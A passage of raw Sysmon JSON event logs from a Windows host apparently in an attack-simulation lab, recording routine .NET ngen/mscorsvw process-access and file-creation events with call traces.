C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.683\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.683","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.683\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.683","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-0010A5200E00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-0010A5200E00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:37.918\r\nProcessGuid: {A837DB8D-048D-5F25-0000-0010A5200E00}\r\nProcessId: 3380\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d34-0\\Microsoft.Transactions.Bridge.Dtc.dll\r\nCreationUtcTime: 2020-08-01 05:58:37.918","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:37.918","ProcessGuid":"{A837DB8D-048D-5F25-0000-0010A5200E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d34-0\\Microsoft.Transactions.Bridge.Dtc.dll","CreationUtcTime":"2020-08-01 05:58:37.918","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.949\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-001004270E00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.949","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-001004270E00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-001004270E00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-001004270E00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.964\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-001004270E00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.964","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-001004270E00}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:38.027\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-0010432B0E00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:38.027","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-0010432B0E00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Micr